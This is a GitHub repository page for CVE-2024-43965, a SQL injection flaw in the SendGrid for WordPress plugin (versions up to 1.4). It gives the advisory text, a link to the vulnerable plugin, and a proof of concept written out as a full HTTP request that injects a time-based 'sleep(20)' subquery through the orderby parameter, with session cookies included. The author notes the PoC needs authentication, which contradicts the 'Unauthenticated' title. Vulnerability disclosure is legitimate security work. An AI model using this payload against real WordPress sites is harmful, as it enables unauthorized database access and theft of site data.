Skip to content
/ CVE-2024-43965 Public

SendGrid for WordPress <= 1.4 - Unauthenticated SQL Injection

1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

RandomRobbieBF/CVE-2024-43965

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
README.md
README.md
 
 

Repository files navigation

CVE-2024-43965

SendGrid for WordPress <= 1.4 - Unauthenticated SQL Injection

Description

The SendGrid for WordPress plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Type: plugin
CVSS Score: 10
CVE: CVE-2024-43965
Slug: wp-sendgrid-mailer

Download Link: https://downloads.wordpress.org/plugin/wp-sendgrid-mailer.1.4.zip

POC - This poc needs auth sadly

GET /wp-admin/admin.php?page=wp-mailplus-logs&orderby=sent_time%2c(select*from(select(sleep(20)))a)&order=asc HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=wp-mailplus-logs
Connection: keep-alive
Cookie: thc_time=1731228211; wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1728983677%7C4Xhd7TcV61WG4vHjAg7FnUTbbGjPn6suDuM3pdK1Lif%7C64e3c5190e9d6981e485354f702a6f61dc8d35c827776156e02acbc906e9438b; _delighted_web={%22FutSOUgy5edCcTk9%22:{%22_delighted_fst%22:{%22t%22:%221694595337803%22}}}; mailpoet_page_view=%7B%22timestamp%22%3A1727811617%7D; wc_auth_e2df32a6c3e7076dd7dc7d3f3fec39aa=1%7C1729506239%7C78ab8d662a1880b359746913feff6990daed2d6015365243d2e2412561061446; wp-settings-1=libraryContent%3Dbrowse%26posts_list_mode%3Dlist; wp-settings-time-1=1728766871; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1728983677%7C4Xhd7TcV61WG4vHjAg7FnUTbbGjPn6suDuM3pdK1Lif%7C8a736f7917a23bb6af5d41f105cca1cea534aae621f35fae6edbe554d366207f; wp_wpfileupload_e2df32a6c3e7076dd7dc7d3f3fec39aa=XQGEyqgTa4ZpWTEfq92q1b6ZAMRbbNSs
Upgrade-Insecure-Requests: 1
Priority: u=0, i

About

SendGrid for WordPress <= 1.4 - Unauthenticated SQL Injection

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published